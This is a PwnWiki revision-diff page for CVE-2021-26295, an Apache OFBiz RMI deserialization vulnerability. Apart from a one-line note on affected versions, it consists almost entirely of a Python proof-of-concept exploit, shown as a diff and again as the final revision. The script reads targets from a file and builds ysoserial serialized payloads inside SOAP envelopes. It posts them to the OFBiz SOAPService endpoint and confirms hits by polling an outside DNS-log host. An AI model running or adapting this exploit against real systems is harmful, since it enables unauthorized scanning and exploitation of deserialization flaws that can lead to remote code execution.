Difference between revisions of "CVE-2021-26295 Apache OFBiz RMI反序列化漏洞"

From PwnWiki
(Marked this version for translation)
 
Line 9: Line 9:
 
==POC==
 
==POC==
 
<pre>
 
<pre>
 +
#coding:utf-8
 +
import binascii
 +
import os
 
import requests
 
import requests
import sys
+
import urllib3
import sys
+
import uuid
import subprocess
+
urllib3.disable_warnings()
import binascii
+
def main():
from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
     id = requests.get("https://dns.xn--9tr.com/new_gen").text.split(".")[0]
 
+
     if(not os.path.exists("target.txt")):
def title():
+
        exit("put url in target.txt! ")
     print('+------------------------------------------')
+
     if(not os.path.exists("ysoserial.jar")):
     print('+  \033[34mVersion: Apache OFBiz                                            \033[0m')
+
        exit("where is ysoserial.jar?")
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
+
     with open("target.txt")as f:
     print('+  \033[36mUrl        >>> http://xxx.xxx.xxx.xxx                            \033[0m')
+
        urls = f.readlines()
    print('+  \033[36mDnslog      >>> http://xxx.xxx.xxx.xxx                            \033[0m')
+
     for url in urls:
     print('+------------------------------------------')
+
        url = url.strip()
 
+
        uid = uuid.uuid1().hex
def trans(s):
+
        cmd = "java -jar .\ysoserial.jar URLDNS http://{0}.{1}.y.dns1.tk > tmp".format(uid,id)
     return "%s" % ''.join('%.2x' % x for x in s)
+
        r = os.popen(cmd)  
 
+
        r.close()
def POC_1(target_url, Dnslog):
+
         with open("tmp",'rb') as f:
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "URLDNS", Dnslog], stdout=subprocess.PIPE)
+
            payload = binascii.hexlify(f.read())
    data = popen.stdout.read()
+
        data = '''
    hex_data = trans(data)
+
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">  
    headers = {
+
            <soapenv:Header/>
         'Content-Type': 'text/xml'
+
            <soapenv:Body>
    }
+
            <ser>
    post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><peiqi:clearAllEntityCaches xmlns:peiqi="http://ofbiz.apache.org/service/"><peiqi:cus-obj>%s</peiqi:cus-obj></peiqi:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data
+
        <map-HashMap>
    vuln_url = target_url + "/webtools/control/SOAPService"
+
            <map-Entry>
    try:
+
                <map-Key>
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
                    <cus-obj>{0}</cus-obj>
        response = requests.post(url=vuln_url, data=post_data, headers=headers, verify=False, timeout=5)
+
                </map-Key>
         print("\033[36m[o] 正在请求 {}/webtools/control/SOAPService..... \033[0m".format(target_url))
+
                <map-Value>
        if response.status_code == 200:
+
                    <std-String value="http://baidu.com"/>
             print("\033[36m[o] 请检查 Dnslog 响应\n \033[0m")
+
                </map-Value>
 +
            </map-Entry>
 +
        </map-HashMap>
 +
            </ser>
 +
            </soapenv:Body>
 +
            </soapenv:Envelope>
 +
            '''.format(payload.decode())
 +
        headers = {
 +
            "user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"
 +
        }
 +
        url = url+"/webtools/control/SOAPService"
 +
        try:
 +
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)
 +
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)
 +
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)
 +
         except:
 +
            pass
 +
        dnslogresurl = "https://dns.xn--9tr.com/"+id
 +
        if(uid in requests.get(dnslogresurl).text):
 +
             print("[+] {0} 漏洞存在".format(url))
 
         else:
 
         else:
             print("\033[31m[x] 请求失败 \033[0m")
+
             print("[-] {0} 漏洞不存在".format(url))
            sys.exit(0)
+
     print("[+] 请到 {0} 查看结果".format(dnslogresurl))
 
 
     except Exception as e:
 
        print("\033[31m[x] 请求失败 \033[0m")
 
 
 
  
if __name__ == '__main__':
+
if __name__ == "__main__":
     title()
+
     main()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
 
    Dnslog = str(input("\033[35mDnslog >>> \033[0m"))
 
    POC_1(target_url, Dnslog)
 
 
</pre>
 
</pre>

Latest revision as of 15:11, 24 March 2021

Other languages:
Chinese • ‎English • ‎español • ‎français • ‎русский • ‎中文(繁體)‎

漏洞影響

Apache OFBiz < 17.12.06


POC

#coding:utf-8
import binascii
import os
import requests
import urllib3
import uuid
urllib3.disable_warnings()
def main():
    id = requests.get("https://dns.xn--9tr.com/new_gen").text.split(".")[0]
    if(not os.path.exists("target.txt")):
        exit("put url in target.txt! ")
    if(not os.path.exists("ysoserial.jar")):
        exit("where is ysoserial.jar?")
    with open("target.txt")as f:
        urls = f.readlines()
    for url in urls:
        url = url.strip()
        uid = uuid.uuid1().hex
        cmd = "java -jar .\ysoserial.jar URLDNS http://{0}.{1}.y.dns1.tk > tmp".format(uid,id)
        r = os.popen(cmd)   
        r.close()  
        with open("tmp",'rb') as f:
            payload = binascii.hexlify(f.read())
        data = '''
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
            <soapenv:Header/>
            <soapenv:Body>
            <ser>
        <map-HashMap>
            <map-Entry>
                <map-Key>
                    <cus-obj>{0}</cus-obj>
                </map-Key>
                <map-Value>
                    <std-String value="http://baidu.com"/>
                </map-Value>
            </map-Entry>
        </map-HashMap>
            </ser>
            </soapenv:Body>
            </soapenv:Envelope>
            '''.format(payload.decode())
        headers = {
            "user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"
        }
        url = url+"/webtools/control/SOAPService"
        try:
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)
        except:
            pass
        dnslogresurl = "https://dns.xn--9tr.com/"+id
        if(uid in requests.get(dnslogresurl).text):
            print("[+] {0} 漏洞存在".format(url))
        else:
            print("[-] {0} 漏洞不存在".format(url))
    print("[+] 请到 {0} 查看结果".format(dnslogresurl))

if __name__ == "__main__":
    main()
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-26295_Apache_OFBiz_RMI反序列化漏洞&oldid=646"